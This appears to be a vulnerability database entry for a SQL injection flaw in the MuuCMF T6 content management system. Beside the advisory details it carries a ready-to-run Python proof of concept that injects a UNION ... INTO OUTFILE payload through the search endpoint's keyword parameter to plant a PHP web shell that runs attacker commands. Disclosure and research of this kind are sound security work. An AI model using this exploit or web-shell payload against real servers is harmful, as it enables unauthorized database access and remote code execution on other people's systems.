Security Vulnerability Report
CVE-2026-36962 CVSS 7.3 HIGH

CVE-2026-36962

Published: 2026-05-11 18:16:32
Last Modified: 2026-05-12 20:16:40

Description

SQL Injection in MuuCMF T6 v1.9.4.20260115 allows an unauthenticated attacker to compromise the entire database, achieve unauthorized administrative access, and potentially gain remote code execution by writing malicious files to the server's file system via the keyword parameter in the /index/controller/Search.php endpoint.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

MuuCMF T6 v1.9.4.20260115

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
import requests


def exploit_sqli(target_url):
    """
    PoC for CVE-2026-36962 SQL Injection in MuuCMF T6.
    Attempts to write a webshell via SQL Injection.
    """
    # Vulnerable endpoint
    endpoint = "/index/controller/Search.php"
    # Malicious payload to write a PHP shell
    # Note: This requires the MySQL user to have FILE privileges and a known web root
    payload = (
        "?keyword=test' UNION SELECT 1,2,3,4,"
        "'<?php system($_GET[\"cmd\"]); ?>' "
        "INTO OUTFILE '/var/www/html/shell.php'-- -"
    )
    full_url = target_url + endpoint + payload
    try:
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Payload sent to {full_url}")
            print("[+] Check if shell.php was created at /var/www/html/shell.php")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://example.com"
    exploit_sqli(target)
```

Weakness

CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection')

References

https://gitee.com/dameng100/muucmf
https://thinhneee.github.io/posts/muucmf-sqli/